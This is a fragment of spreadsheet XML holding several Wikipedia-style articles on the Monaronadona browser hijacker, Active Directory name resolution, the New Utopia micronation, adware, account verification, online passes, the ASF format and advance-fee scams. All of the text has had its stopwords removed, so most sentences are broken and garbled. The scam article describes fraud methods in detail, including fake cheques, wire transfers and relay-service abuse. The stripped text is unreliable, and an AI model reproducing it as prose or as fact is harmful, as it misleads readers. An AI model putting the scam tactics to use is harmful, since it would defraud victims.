    <t>monaronadona browser hijacker uses unique tactics popups alert messages stating infected virus. uses message send users hunt monaronadona remedy malicious websites. vendor description monaronadona known come various rogue programs registry clean unigray anti-virus. infection monaronadona usually downloaded unigray anti-virus program certain registry clean fix. monaronadona remains inactive times left undiscoverable anti-virus programs. monaronadona uses stealth tactics presenting infection message. symptoms monaronadona displays following false warning message attempt scare users searching fix. “hi, name monaronadona. virus wreck your observe strange behavior like program windows disappearing etc, it’s this. created protest human rights violation observed throughout world purpose existence remind stress world respect humanity.” this message sends computer users searching internet likelihood running another malicious website spending money something bogus. monaronadona installs following windows registry keys: hkey_local_machine\software\microsoft\windows\currentversion\uninstall\monaronadona hkey_local_machine\software\monaronadona.com hkey_local_machine\software\microsoft\internet explorer\main\\window title hkey_current_user\software\microsoft\outlook express\\window title hkey_current_user\software\microsoft\internet explorer\main\\window title hkey_current_user\software\microsoft\windows\currentversion\policies\system\\disabletaskmgr hkey_local_machine\software\microsoft\windows\currentversion\policies\system\\disabletaskmgr known variants monaronadona behaves unlike known rogue software. monaronadona characteristics come rogue software unigray antivirus. monaronadona also identified troj_monagray.a trojan infection. also malware spyware adware rogue software wikipedia's spyware removal category references external links monaronadona "virus</t>
  </si>
  <si>
    <t>Ambiguous name resolution</t>
  </si>
  <si>
    <t>ambiguous name resolution (anr) feature available microsoft's active directory allows resolution multiple objects computer network based limited input. user able select correct entry results. allow feature operate, attributes need enabled directory schema. this extension lightweight directory access protocol. when using microsoft's outlook outlook app, partial information typed from: fields result query provide potential matches. ldap lightweight directory access protocol ldap active directory uses default attributes flagged ambiguous name resolution filter results input query. microsoft active directory searchflags attribute flag defines special properties related searching attribute.in windows 2000 following attributes default anr: givenname surname displayname legacyexchangedn msexchmailnickname physicaldeliveryofficename proxyaddress samaccountname example search many users name present active directory. when bill white, bill whitehead, bill smith exist, enabled, search "bill white" looks like "anr=bill white". active directory will: notice "anr" embedded space. check schema determine objects search index bits set. perform "or" search "bill white*" default attributes listed above. then searches for: given-name=bill* surname=white*the search results returned matches "bill white" are: bill white "bill white*" matches displayname bill whitehead "bill*" "white*" matches given-name=bill* surname=white* but, bill smith appear because: "bill*" "white*" match given-name surname bill smith external links outlooks's ambiguous name resolution search algorithm attributes ambiguous name resolution filter active directory searches work (anr strings included) references</t>
  </si>
  <si>
    <t>New Utopia</t>
  </si>
  <si>
    <t>utopia, officially principality utopia, micronation claiming misteriosa bank, unclaimed undersea rise land caribbean cayman islands hoped build structures raised underwater land. first proclaimed april 1999 american businessman howard turney ("prince lazarus"), name lazarus long; project recently revived early 2017). history project founded 1995 lazarus long, founder utopia, came across shallow unclaimed underwater area caribbean sea. filed claim united nations. long raised $100 million investors world, majority coming united states. then, u.s. securities exchange commission sec) termed utopia "fraudulent nationwide internet scheme", complained long made "material misrepresentations omissions concerning, among things, status construction project, companies associated project, safety investment, status commission's investigation activities." sec's case long (sec lazarus long) ruled long. utopia's project restarted early 2017 lazarus long's daughter elizabeth henderson, promises project completed 2021. structure social model trade system would hyper-capitalistic, modeled writings rand, napoleon hill, robert heinlein, dale carnegie, adam smith. long also promised tiny nation would clinic better mayo clinic, casino modelled monte carlo casino, "the ultimate luxury spa". residents would live apartments condominiums would built. would haven, services paid imported consumable goods. founder before creating utopia, howard turney introduced human growth hormone (hgh) anti-aging doctor. impressed results became advocate hormone february 1993 created longevity called dorado clinic playa carmen, mexico. 1995 changed name lazarus long, recurrent character heinlein's novels goes several rejuvenation treatments order live hundreds years eventually become immortal. also around 1995 stopped injecting dorado clinic corruption local officers, moved years later stop injecting also doctors stopped prescribing illegal doping sport. then tried fund utopia, place government tell could couldn't. 1999 closed bond offering bonds registered them. dedicated rest life creation utopia. lazarus long, died april 2012 also list micronations dominion melchizedek republic minerva references external links official website</t>
  </si>
  <si>
    <t>Password (disambiguation)</t>
  </si>
  <si>
    <t>password word, phrase string characters used gain access resource, object, area information. password also refer film password (2019 bengali film), indian film password (2019 bangladeshi film) password (2019 nepali film) music passwords (band), canadian rock band password (record producer), nigerian record producer passwords (album), 2018 album american folk rock band dawes password, 2000 album geoff muldaur "password", song dram 2016 album baby dram "password", song kylie minogue 2001 single your disco needs "password", 1964 song kitty wells television password (british game show), british panel game show based version, 1963–1983 password (american game show), american television game show password, home version television game show password other uses password (video gaming), video game saving method passwords (2000), book french philosopher jean baudrillard, published french mots passe european strategic program research information technology (esprit), project researching x.509 technology, called password also password manager, software hardware used generate complex computer passwords pages titles beginning password</t>
  </si>
  <si>
    <t>Adware</t>
  </si>
  <si>
    <t>adware, often called advertising-supported software developers, software generates revenue developer automatically generating online advertisements user interface software screen presented user installation process. software generate types revenue: display advertisement another "pay-per-click" basis, user clicks advertisement. some advertisements also spyware, collecting reporting data user, sold used targeted advertising user profiling. software implement advertisements variety ways, including static display, banner display, full screen, video, pop-up form. forms advertising carry health, ethical, privacy security risks users. 2003 microsoft encyclopedia security sources term "adware" differently: "any software installs system without knowledge displays advertisements user browses internet", i.e., form malware. some software developers offer software free charge, rely revenue advertising recoup expenses generate income. some also offer version software without advertising. advertising-supported software legitimate software, advertising functions integrated bundled program. adware usually seen developer recover development costs, generate revenue. cases, developer provide software user free charge reduced price. income derived presenting advertisements user allow motivate developer continue develop, maintain upgrade software product. advertising-supported software business becoming increasingly popular, third business executives 2007 survey mckinsey company planning using ad-funded software within following years. advertisement-funded software also business models open-source software. application software some software offered advertising-supported mode paid, advertisement-free mode. latter usually available online purchase license registration code software unlocks mode, purchase download separate version software.some software authors offer advertising-supported versions software alternative option business organizations seeking avoid paying large sums software licenses, funding development software higher fees advertisers.examples advertising-supported software include adblock plus ("acceptable ads"), windows version internet telephony application skype, amazon kindle family e-book readers, versions called "kindle special offers" display advertisements home page sleep mode exchange substantially lower pricing.in 2012, microsoft advertising division, microsoft advertising, announced windows major release microsoft windows operating system, would provide built-in methods software authors advertising support business model. idea considered since early 2005. most editions windows include adware default. software service support advertising popular business model software service (saas) web. notable examples include email service gmail google workspace products (previously called google apps suite), social network facebook. microsoft also adopted advertising-supported model many social software saas offerings. microsoft office live service also available advertising-supported mode. definition spyware, consent, ethics view federal trade commission staff, appears general agreement software considered "spyware" downloaded installed computer without user's knowledge consent. however, unresolved issues remain concerning how, what, consumers need told software installed computers. instance, distributors often disclose end-user license agreement additional software bundled primary software, participants view disclosure sufficient infer consent. much discussion topic involves idea informed consent, assumption standard eliminates ethical issues given software's behavior. however, majority important software, websites devices adopt similar behavior standard informed consent used, logically user's recourse behavior would become using computer. contract would become ultimatum agree ostracized modern world. this form psychological coercion presents ethical problem using implied inferred consent standard. there notable similarities situation binding arbitration clauses become inevitable contracts united states. furthermore, certain forms strategies advertising shown lead psychological harm, especially children. example childhood eating disorders several studies reported positive association exposure beauty fashion magazines increased level weight concerns eating disorder symptoms girls. malware term adware frequently used describe form malware (malicious software) presents unwanted advertisements user computer. advertisements produced adware sometimes form pop-up, sometimes "unclosable window", sometimes injected pages.when term used way, severity implication varies. while sources rate adware "irritant", others classify "online threat" even rate seriously computer viruses trojans. precise definition term context also varies. adware observes computer user's activities without consent reports software's author called spyware. adwares collect personal information user, causing privacy concerns. however, adware operates legally adware manufacturers even sued antivirus companies blocking adware.programs developed detect, quarantine, remove advertisement-displaying malware, including ad-aware, malwarebytes' anti-malware, spyware doctor spybot search destroy. addition, almost commercial antivirus software currently detect adware spyware, offer separate detection module.a wrinkle adware (using stolen certificates) disables anti-malware virus protection; technical remedies available.adware also discovered certain low-cost android devices, particularly made small chinese firms running allwinner systems-on-chip. there even cases adware code embedded deep files stored system boot partitions, removal involves extensive (and complex) modifications firmware. also malvertising online advertising typhoid adware notes references</t>
  </si>
  <si>
    <t>Account verification</t>
  </si>
  <si>
    <t>account verification process verifying existing account owned operated specified real individual organization. number websites, example social media websites, offer account verification services. verified accounts often visually distinguished check mark icons badges next names individuals organizations. account verification enhance quality online services, mitigating sockpuppetry, bots, trolling, spam, vandalism, fake news, disinformation election interference. history account verification initially feature public figures accounts interest, individuals "music, acting, fashion, government, politics, religion, journalism, media, sports, business interest areas". introduced twitter june 2009, followed google+ 2011, facebook 2012, instagram 2014, pinterest 2015. youtube, users able submit request verification badge obtain 100,000 subscribers. also "official artist" badge musicians bands.in july 2016, twitter announced that, beyond public figures, individual would able apply account verification. this temporarily suspended february 2018, following backlash verification organisers far-right unite right rally perception verification conveys "credibility" "importance". march 2018, live-stream periscope, jack dorsey, co-founder twitter, discussed idea allowing individual verified account. twitter reopened account verification applications 2021 revamping account verification criteria. this time offering notability criteria account categories government, companies, brands, organizations, news organizations journalists, entertainment, sports activists, organizers, influential individuals. among categories listed, miss specific category fits scientists religious. instagram began allowing users request verification august 2018.in april 2018, mark zuckerberg, co-founder facebook, announced purchasers political issue-based advertisements would required verify identities locations. also indicated facebook would require individuals manage large pages verified. 2018, kent walker, senior vice president google, announced that, united states, purchasers political-leaning advertisements would need verify identities. techniques identity verification services identity verification services third-party solutions used ensure person provides information associated identity real person. such services verify authenticity identity documents drivers licenses passports, called documentary verification, verify identity information authoritative sources credit bureaus government data, called non-documentary verification. identity documents verification uploading scanned photographed identity documents practice use, example facebook. according facebook, reasons person would asked send scan photograph facebook: show account ownership confirm name.in january 2018, facebook purchased confirm.io, startup advancing technologies verify authenticity identification documentation. biometric verification behavioral verification behavioral verification computer-aided automated detection analysis behaviors patterns behavior verify accounts. behaviors detect include sockpuppets, bots, cyborgs, trolls, spammers, vandals, sources spreaders fake news, disinformation election interference. behavioral verification processes flag accounts suspicious, exclude accounts suspicion, offer corroborating evidence processes account verification. bank account verification identity verification required establish bank accounts financial accounts many jurisdictions. verifying identity financial sector often required regulation know your customer customer identification program. accordingly, bank accounts corroborating evidence performing account verification. bank account information provided creating verifying account making purchase. postal address verification postal address information provided creating verifying account making subsequently shipping purchase. hyperlink code sent user mail, recipients entering website verifying postal address. telephone number verification telephone number provided creating verifying account added account obtain features. during process verifying telephone number, confirmation code sent phone number specified user, example message sent mobile phone. user receives code sent, enter website confirm receipt. email verification email account often required create account. during process, confirmation hyperlink sent email message email address specified person. email recipient instructed email message navigate provided confirmation hyperlink person creating account. navigating hyperlink confirms receipt email person. added value email account purposes account verification depends upon process account verification performed specific email service provider. multi-factor verification multi-factor account verification account verification simultaneously utilizes number techniques. multi-party verification processes account verification utilized multiple service providers corroborate another. openid connect includes user information protocol used link multiple accounts, corroborating user information. account verification good standing services, account verification synonymous good standing. twitter reserves right remove account verification users' accounts time without notice. reasons removal reflect behaviors twitter include: promoting hate and/or violence against, directly attacking threatening people basis race, ethnicity, national origin, sexual orientation, gender, gender identity, religious affiliation, age, disability, disease; supporting organizations individuals promote above; inciting engaging harassment others; violence dangerous behavior; directly indirectly threatening encouraging form physical violence individual group people, including threatening promoting terrorism; violent, gruesome, shocking, disturbing imagery; self-harm, suicide; engaging activity twitter violates twitter rules. also digital identity identity assurance identity management federated identity real-name system references</t>
  </si>
  <si>
    <t>Online pass</t>
  </si>
  <si>
    <t>online pass digital rights management system restricting access supplemental functionality product using single-use serial number. online passes primarily intended hinder discourage second-hand sale product, allow producer product still return profits second-hand copies product. these passes first primarily used video game industry, requiring code found game's manual leaflets access certain online content, notably online multiplayer. following criticism practice, several major video game publishers, including electronic arts ubisoft, began phasing 2013. similar tactic surfaced academic textbook industry, regulating supplemental material online content, intent prevent students obtaining second-hand borrowed copy needed textbook. this requires purchase copy order functionality. video games usage online passes video games intended counter popularity stores gamestop, sell second-hand copies video games. online passes traditionally used restrict access game's multiplayer modes online content; ship single-use codes printed inserts packaged retail copies video games, must redeemed user order access multiplayer online modes particular game. player unused online pass (such buying used game), player either purchase access console access limited trial game's online content. cases, game similarly come code redeemed free downloadable content items released upon shortly game's launch, stone prisoner blood dragon armor dragon origins, house valor quest kingdoms amalur: reckoning, package additional songs rock band 2.alongside downloadable content, online passes additional revenue stream used make profits lost second-hand sales, encourage players games retail extra access game's full content. supporters online passes publishers using argue requiring buyers used games extra access online content services fair system paying costs required maintain online resources. opponents contend adoption online pass systems lead removing essential functionality used games possibly even preventing resale video games. studios founder curt schilling justified online pass unlock seven-part bonus quest "house valor" single-player kingdoms amalur: reckoning (which published "day dlc" intended incentive early adopters. however, decision still provoked discussion appropriateness model. history among first video games require online pass socom u.s. navy seals: fireteam bravo playstation portable, required one-time voucher included retail copies game access multiplayer modes, charging replacements. however, case, sony computer entertainment stated requirement intended combat piracy. late 2009, began implementing online passes games part initiative known "project dollar"; mass effect used online pass allow access bonus content "cerberus network" system, dragon origins came code could redeemed download first major release, stone prisoner, free, well exclusive armor set. 2010, announced beginning tiger woods tour future sports titles would require online passes access multiplayer.in mid-2013, many publishers began phase online passes; 2013, electronic arts announced would, customer feedback, discontinue future online passes upcoming titles, retroactively remove online pass requirements existing titles. november 2013, ubisoft followed suit discontinuing uplay passport system future titles, making pass recently released assassin’s creed black flag available charge. ubisoft spokesperson stated system longer best approach ensuring customers best possible experience facets games", noting black flag's single-player campaign contained passive online features would otherwise unavailable without activating pass. sony specifically forbids online passes developers playstation titles; users must playstation plus subscription online multiplayer games, sony want publishers additional designed charge users further. textbooks similar system recently used textbook publishers, requiring online pass offer supplemental content; including online message board, assignment system homework assigned handed even e-book version title. similarly intended discourage second-hand re-sale sharing textbooks allowing online functionality utilized single student; requiring others copy book obtain access code individually. also damaged good digital rights management references</t>
  </si>
  <si>
    <t>Advanced Systems Format</t>
  </si>
  <si>
    <t>advanced systems format (formerly advanced streaming format, active streaming format) microsoft's proprietary digital audio/digital video container format, especially meant streaming media. part media foundation framework. overview features based serialized objects essentially byte sequences identified guid marker. format specify (i.e. codec) video audio encoded; specifies structure video/audio stream. this similar function performed quicktime file format, avi, formats. objectives support playback digital media servers, http servers, local storage devices hard disk drives. common media contained within file windows media audio (wma) windows media video (wmv). common file extensions files extension .wma (audio-only files using windows media audio, mime-type audio/x-ms-wma) .wmv (files containing video, using windows media audio video codecs, mime-type video/x-ms-asf). these files identical .asf files extension mime-type. different extensions used make easier identify content media file.asf files also contain objects representing metadata, artist, title, album genre audio track, director video track, much like tags files. supports scalable media types stream prioritization; such, format optimized streaming. container provides framework digital rights management windows media audio windows media video. analysis older scheme used reveals using combination elliptic curve cryptography exchange, block cipher, custom block cipher, stream cipher sha-1 hashing function. container-based media sometimes still streamed internet either protocol rtsp protocol. mostly, however, contain material encoded 'progressive download', distributed webserver offers advantages streaming: file starts playing soon minimum number bytes received rest download continues background watching listening. library congress digital preservation project considers facto successor riff. 2010 google picked riff container format webp. license specification downloadable microsoft website, format implemented license microsoft however allow distribution sources compatible open source licenses. author free software project virtualdub reported microsoft employee informed software violated microsoft patent regarding playback.certain error-correcting techniques related patented united states (united states patent 6,041,345 levi, march 2000) microsoft 2019-08-10. also audio video interleave (avi) advanced stream redirector (asx) comparison container formats references external links overview advanced systems format overview format library congress analysis format sustainability container format v2.0 (free available unused) v1.0 (reconstructed) msdn embed windows media player html page (for webmasters) creating windows media custom experience (for webmasters)</t>
  </si>
  <si>
    <t>Advance-fee scam</t>
  </si>
  <si>
    <t>advance-fee scam form fraud common types confidence tricks. scam typically involves promising victim significant share large money, return small up-front payment, fraudster claims used obtain large sum. victim makes payment, fraudster either invents series fees victim simply disappears.the federal bureau investigation (fbi) states advance scheme occurs victim pays money someone anticipation receiving something greater value loan, contract, investment, gift receives little nothing return." there many variations type scam, including nigerian prince scam, also known scam. number "419" refers section nigerian criminal code dealing fraud charges penalties offenders. scam used traditional mail prevalent online communications like emails. other variations include spanish prisoner scam black money scam. while nigeria often nation referred scams, mainly originate nations. other nations known high incidence advance-fee fraud include: ivory coast, togo, south africa, netherlands, spain, poland jamaica. history modern scam similar spanish prisoner scam dates back late 18th century. con, businessmen contacted individual allegedly trying smuggle someone connected wealthy family prison spain. exchange assistance, scammer promised share money victim exchange small amount money bribe prison guards.one variant scam date back 18th 19th century, similar letter, entitled "the letter jerusalem." this illustrated memoirs eugène françois vidocq, former french criminal private investigator. another variant scam, dating back 1830, appears similar emails today: "sir, doubtlessly astonished receiving letter person unknown you, favour you..." goes talk casket containing 16,000 francs gold diamonds late marchioness.the modern transnational scam traced back germany 1922 became popular 1980s. there many variants template letter. these, sent postal mail, addressed woman's husband inquire health. asked profits $24.6 million investment ended telephone number.other official-looking letters sent writer said director state-owned nigerian national petroleum corporation. said wanted transfer million recipient's bank account—money budgeted never spent. exchange transferring funds nigeria, recipient would keep total. process started, scammer asked sheets company's letterhead, bank account numbers, personal information. variants involved mention nigerian prince member royal family seeking transfer large sums money country—thus, scams sometimes called "nigerian prince emails".the spread e-mail email harvesting software significantly lowered cost sending scam letters using internet lieu international post. nigeria often nation referred scams, originate nations well. example, 2007, head economic financial crimes commission stated scam emails frequently originated african countries eastern europe. within european union, high incidence advance-fee fraud netherlands spain.according cormac herley, microsoft researcher, sending email repels gullible, scammer gets promising marks self-select." nevertheless, nigeria earned reputation center email scammers, number refers article nigerian criminal code (part chapter "obtaining property false pretenses; cheating") dealing fraud.modern variations arisen subsequently became fairly popular among nigerian youth circles. such variants include “sugar daddy/sugar momma” schemes involving advance fees, money “flipping” involving mobile payment apps, related scams. nigerian cyber-fraudsters (popularly known yahoo boys) commonly refer victims maga mugu, meaning 'senseless person' 'fool'. some scammers accomplices united states abroad move finish deal initial contact made. motives many scammers tend come poorer more-educated backgrounds, internet access better education, along inability afford basic necessities, drive people committing online fraud. they also influenced social media celebrities artists promote scamming "cool" trend quickly gain access luxury items like sports cars fashion.in case nigeria, rise scamming cases boom cybercafes, series economic crashes 1980s, resulting joblessness among young people nigeria. implementation this scam usually begins perpetrator contacting victim email, instant messaging, social media using fake email address fake social media account. fraudster makes offer would allegedly result large payoff victim. email subject line something like "from desk barrister [name]", "your assistance needed", "important", "dear madam" details vary, usual story person, often government bank employee, knows large amount unclaimed money gold cannot access directly, usually right it.such people, real people impersonated scammer fictitious characters played artist, could include, example, wife deposed african leader amassed stolen fortune, bank employee knows terminally wealthy person relatives wealthy foreigner deposited money bank dying plane crash (leaving known next kin), soldier stumbled upon hidden cache gold iraq, business audited government, disgruntled worker corrupt government official embezzled funds, refugee, similar characters. money could form gold bullion, gold dust, money bank account, blood diamonds, series cheques bank drafts, forth. sums involved usually millions dollars, investor promised large share, typically fifty percent, return assisting fraudster retrieve expatriate money. although vast majority recipients respond emails, small percentage enough make scam worthwhile many millions messages sent daily.to help persuade victim agree deal, scammer often sends false documents bear official government stamps, seals. scammers often mention false addresses photographs taken internet magazines falsely represent themselves. often, photograph used scammer picture person involved scheme. multiple "people" write involved schemes continue, often fictitious; many cases, person controls fictitious personae used scams.once victim's confidence gained, scammer introduces delay monetary hurdle prevents deal occurring planned, transmit money, need bribe bank official. could help loan?" "for party transaction, must holdings nigerian bank $100,000 more" similar. this money stolen victim; victim willingly transfers money, usually irreversible channel wire transfer, scammer receives pockets it.often always, delays additional costs added fraudster, always keeping promise imminent large transfer alive, convincing victim money victim currently paying would covered several times payoff. implication payments used white-collar crime, bribery, even money promised stolen government royal/wealthy family, often prevents victim telling others "transaction", would involve admitting intended complicit international crime.sometimes psychological pressure added claiming scammers' side, certain fees, sell belongings mortgage house comparing salary scale living conditions country west. much time, however, needed psychological pressure self-applied: victims provided money toward payoff, feel vested interest seeing "deal" through. some victims even believe cheat party, walk away money instead percentage promised.the essential fact advance-fee fraud operations promised money transfer victim never happens money exist. perpetrators rely fact that, time victim realizes (often confronted third party noticed transactions conversation recognized scam), victim sent thousands dollars money. sometimes thousands borrowed stolen scammer untraceable and/or irreversible means wire transfer. scammer disappears, victim left hook money sent scammer. during course many schemes, scammers victims supply bank account information. usually "test" devised scammer gauge victim's gullibility; bank account information used directly scammer, fraudulent withdrawal account easily detected, reversed, traced. scammers instead usually request payments made using wire transfer service like western union moneygram. reason given scammer usually relates speed payment received processed, allowing quick release supposed payoff. real reason using money-sending services wire transfers irreversible often untraceable. further, services ideal identification beyond knowledge details transaction often required, making receipt funds almost entirely completely anonymous. however, bank account information obtained scammers sometimes sold bulk fraudsters wait months victim repair damage caused initial scam raiding accounts victim close. telephone numbers used scammers tend come burner phones. ivory coast, scammer purchase inexpensive mobile phone pre-paid card without submitting identifying information. scammers believe traced, discard mobile phones purchase ones.the spam emails used scams often sent internet cafés equipped satellite internet connection. recipient addresses email content copied pasted webmail interface using stand-alone storage medium, memory card. certain areas lagos, festac, contain many cyber cafés serve scammers; cyber cafés often seal doors outside hours, 10:30pm 7:00am, scammers inside work without fear discovery.nigeria also contains many businesses provide false documents used scams. after scam involving forged signature nigerian president olusegun obasanjo summer 2005, nigerian authorities raided market oluwole section lagos. there, police seized thousands nigerian non-nigerian passports, 10,000 blank british airways boarding passes,10,000 united states postal money orders, customs documents, false university certificates, printing plates, computers.the "success rate" scammers also hard gauge, since operating illegally keep track specific numbers. individual estimated sent emails received seven replies, citing received reply, percent certain would money. tens thousands emails sent every thousands individuals, take high success rate worthwhile. countermeasures recent years, efforts made governments, internet companies, individuals combat scammers involved advance-fee fraud scams. 2004, nigerian government formed economic financial crimes commission (efcc) combat economic financial crimes, advanced-fee fraud. 2009, nigeria's efcc announced adopted smart technology developed microsoft track fraudulent emails. they hoped service, dubbed "eagle claw", running full capacity warn quarter million potential victims.some individuals participate practice known scam baiting, pose potential targets engage scammers lengthy dialogue waste scammer's time decrease time available actual victims. likewise, artists against 419, set-up volunteers offers public database information scam websites. they work closely together apwg share data financial institutions cybersecurity companies. common elements irreversible money transfers central element advance-fee fraud transaction victim scammer must untraceable irreversible. otherwise, victim, become aware scam, could successfully retrieve money alert officials could track accounts used scammer.wire transfers western union moneygram ideal purpose. international wire transfers cannot cancelled reversed, person receiving money cannot tracked. other non-cancellable forms payment include postal money orders cashier's cheques, wire transfer western union moneygram common. anonymous communication since scammer's operations must untraceable avoid identification, scammer often impersonating someone else, communication scammer victim must done channels hide scammer's true identity. following options particular widely used. web-based email because many free email services require valid identifying information also allow communication many victims short span time, preferred method communication scammers. some services mask sender's source address (gmail common choice), making scammer's country origin difficult trace. while gmail indeed strip headers emails, possible trace address email. scammers create many accounts wish often several time. addition, email providers alerted scammer's activities suspend account, trivial matter scammer simply create account resume scamming. email hijacking/friend scams some fraudsters hijack existing email accounts advance-fee fraud purposes. instance, social engineering, fraudster impersonates associates, friends, family members legitimate account owner attempt defraud them. variety techniques phishing, keyloggers, computer viruses used gain login information email address. transmissions facsimile machines commonly used tools business whenever client requires hard copy document. they also simulated using services made untraceable prepaid phones connected mobile machines public machine owned document processing business like fedex office/kinko's. thus, scammers posing business entities often transmissions anonymous form communication. this expensive, prepaid phone equipment cost email, skeptical victim, believable. messages abusing bulk senders wasps, scammers subscribe services using fraudulent registration details paying either cash stolen credit card details. they send masses unsolicited messages victims stating competition, lottery, reward, event contact somebody claim prize. typically details party contacted equally untraceable email address virtual telephone number.these messages sent weekend staff service providers working, enabling scammer able abuse services whole weekend. even traceable, give long winding procedures procuring reward (real unreal) impending huge cost transportation duty charges. origin messages often fake websites/addresses.a contemporary (mid-2011) innovation premium rate 'call back' number (instead website email) sms. calling number, victim first reassured 'they winner' subjected long series instructions collect 'winnings'. during message, frequent instructions 'ring back event problems'. call always 'cut off' victim chance note details. some victims call back multiple times effort collect details. scammer thus makes money fees charged calls. telecommunications relay services many scams telephone calls convince victim person deal real, truthful person. scammer, possibly impersonating person nationality gender own, would arouse suspicion telephoning victim. cases, scammers trs, federally funded relay service operator text/speech translation program acts intermediary someone using ordinary telephone deaf caller using teleprinter device. scammer claim deaf, must relay service. victim, possibly drawn sympathy disabled caller, might susceptible fraud.fcc regulations confidentiality laws require operators relay calls verbatim adhere strict code confidentiality ethics. thus, relay operator judge legality legitimacy relay call must relay without interference. this means relay operator warn victims, even suspect call scam. said percent relay calls 2004 scams.tracking phone-based relay services relatively easy, scammers tend prefer internet protocol-based relay services relay. common strategy, bind overseas address router server located soil, allowing us-based relay service providers without interference. sometimes used relay credit card information make fraudulent purchase stolen credit card. many cases however, simply means artist lure victim scam. invitation visit country sometimes, victims invited country meet government officials, associate scammer, scammer themselves. some victims travel instead held ransom. scammers tell victim need visa scammers provide one. victim this, scammers power extort money victim.sometimes victims ransomed, kidnapped, murdered. according 1995 u.s. state department report, fifteen persons murdered 1992 1995 nigeria following advance-fee frauds. 1999 norwegian millionaire kjetil lured south africa scammers murdered. george makronalli lured south africa killed 2004. variants there many variations common stories, also many variations scam works. some commonly seen variants involve employment scams, lottery scams, online sales rentals, romance scams. many scams involve online sales, advertised websites craigslist ebay, property rental. this article cannot list every known future type advanced fraud scheme; major types described. additional examples available external links section article. employment scams this scam targets people posted résumés e.g. sites. scammer sends letter falsified company logo. offer usually indicates exceptional salary benefits, requests victim needs "work permit" working country, includes address (fake) "government official" contact. "government official" proceeds fleece victim extracting fees unsuspecting user work permit fees. variant scam recruits freelancers seeking work, editing translation, requires advance payment assignments offered.many legitimate least fully registered) companies work similar basis, using method primary source earnings. some modelling escort agencies tell applicants number clients lined require sort prior "registration fee", usually paid untraceable method, e.g. western union transfer; paid, applicant informed client cancelled, contacted again.the scammer contacts victim interest "work-from-home" opportunity, asks cash cheque money order reason cannot redeemed locally. cover story, perpetrator scam wishes victim work "mystery shopper", evaluating service provided moneygram western union locations within major retailers wal-mart. scammer sends victim forged stolen cheque money order described above, victim deposits it—banks often credit account value cheque obviously false— sends money scammer wire transfer. later cheque honoured ("bounces") bank debits victim's account. schemes based solely cheque cashing usually offer small part cheque's total amount, assurance many cheques follow; victim buys scam cashes cheques, scammer steal short time. bogus offers more sophisticated scams advertise jobs real companies offer lucrative salaries conditions fraudsters pretending recruitment agents. bogus telephone online interview take place time applicant informed theirs. secure instructed send money work visa travel costs agent, bogus travel agent works scammer's behalf. matter variation, always involve seeker sending agent money, credit card bank account details. newer form employment scam arisen users sent bogus offer, asked give financial information. instead, personal information harvested application process sold third parties profit, used identity theft.another form employment scam involves making people receive fake "interview" told benefits company. attendees made assist conference scammer elaborate manipulation techniques convince attendees purchase products, similar manner catalog merchant business model, hiring requisite. quite often, company lacks form physical catalog help sell products (e.g. jewelry). when "given" job, individual asked promote scam offer own. they also made work company unpaid form "training". similar scams involve making alleged candidates money upfront person training materials services, claim upon successful completion, offered guaranteed job, never materializes. lottery scam lottery scam involves fake notices lottery wins, although intended victim entered lottery. "winner" usually asked send sensitive information name, residential address, occupation/position, lottery number etc. free email account times untraceable without link. addition harvesting information, scammer notifies victim releasing funds requires small (insurance, registration, shipping). once victim sends fee, scammer invents another fee. fake cheque technique described also used. fake stolen cheque, representing part payment winnings, sent; fee, smaller amount received, requested. bank receiving cheque eventually reclaims funds victim.in 2004, variant lottery scam appeared united states: scammer phones victim purporting speaking behalf government grant qualify for, subject advance typically us$250.typical lottery scams address person variation lucky winner. this flag someone entered actual lottery won, organization would know name, simply call lucky winner. online sales rentals many scams involve purchase goods services classified advertisements, especially sites like craigslist, ebay, gumtree. these typically involve scammer contacting seller particular good service telephone email expressing interest item. they typically send fake cheque written amount greater asking price, asking seller send difference alternate address, usually money order western union. seller eager sell particular product wait cheque clear, cheque bounces, funds wired already lost.some scammers advertise phony academic conferences exotic international locations, complete fake websites, scheduled agendas advertising experts particular field presenting there. they offer airfare participants, hotel accommodations. they extract money victims attempt reserve accommodations non-existent hotel.sometimes, inexpensive rental property advertised fake landlord, typically state country) asking rent and/or deposit wired them. artist finds property, pretends owner, lists online, communicates would-be renter make cash deposit. scammer also renter well, case pretend foreign student contact landlord seeking accommodation. they usually state country wish secure accommodations prior arriving. once terms negotiated, forged cheque forwarded greater amount negotiated, fraudster asks landlord wire money back. scams this variation online sales scam high-value, scarce pets advertised bait online advertising websites using little real seller verification like craigslist, gumtree, junkmail. either advertised for-sale adoption. typically advertised online advertising pages complete photographs taken various sources real advertisements, blogs wherever else image stolen. upon potential victim contacting scammer, scammer responds asking details pertaining potential victim's circumstances location pretense ensuring would suitable home.by determining location victim, scammer ensures enough victim allow buyer physically view pet. should scammer questioned, advertisement claimed location initially, scammer claim work circumstances forced relocate. this forces situation whereby communication either email, telephone (normally untraceable numbers) sms.upon victim deciding adopt purchase pet, courier used reality part scam. adopted pet, typically victim expected insurance, food shipping. payment moneygram, western union money mules' bank accounts victims duped work home scams.numerous problems encountered courier phase scam. crate small victim option either purchasing crate conditioning renting also paying deposit, typically called caution cautionary fee. victim also insurance fees paid yet. victim pays fees, become sick veterinarian's assistance sought victim repay courier.additionally, victim asked health certificate needed transport pet, kennel fees recuperation period. scam progresses, similar fictitious fees typical scams. uncommon customs like fees claimed charges scam plot.numerous scam websites used scam. this scam linked classical scams fictitious couriers used, also used types scams lotto scams. romance scam variants romance scam, money-for-romance angle. artist approaches victim online dating service, instant messenger, social networking site. scammer claims interest victim, posts pictures attractive person. scammer uses communication gain confidence, asks money. common example romance scams depicted fraudulent activities boys, popularly known yahoo boys nigeria.the artist claim interested meeting victim needs cash book plane, ticket, rent hotel room, personal-travel costs gasoline vehicle rental, cover expenses. cases, claim they're trapped foreign country need assistance return, escape imprisonment corrupt local officials, medical expenses illness contracted abroad, scammer also confidence gained romance angle introduce variant original nigerian letter scheme, saying need money valuables country offer share wealth, making request help leaving country even attractive victim. scams often involve meeting someone online match-making service. scammer initiates contact target area requests money transportation fare. scammers typically money sent money order wire transfer need travel, medical business costs.when victim travels meeting, deadly consequence case jette jacobs, australia. jette jacobs traveled south africa supposedly marry scammer, jesse orowo omokoh, sent $90000. three-year period. body discovered february 2013, mysterious circumstances, days meeting omokoh. omokoh fled back nigeria. after questioning nigeria, omokoh arrested. found fake online identities. never charged murder, inability prove hand death jette jacobs, fraud charges. mobile tower installation fraud this variant advance-fee fraud widespread india pakistan. fraudster uses internet classified websites print media lure public installation mobile phone tower property, promise huge rental returns. fraudster also creates fake websites appear legitimate. victims part money pieces fraudster account government service tax, government clearance charges, bank charges, 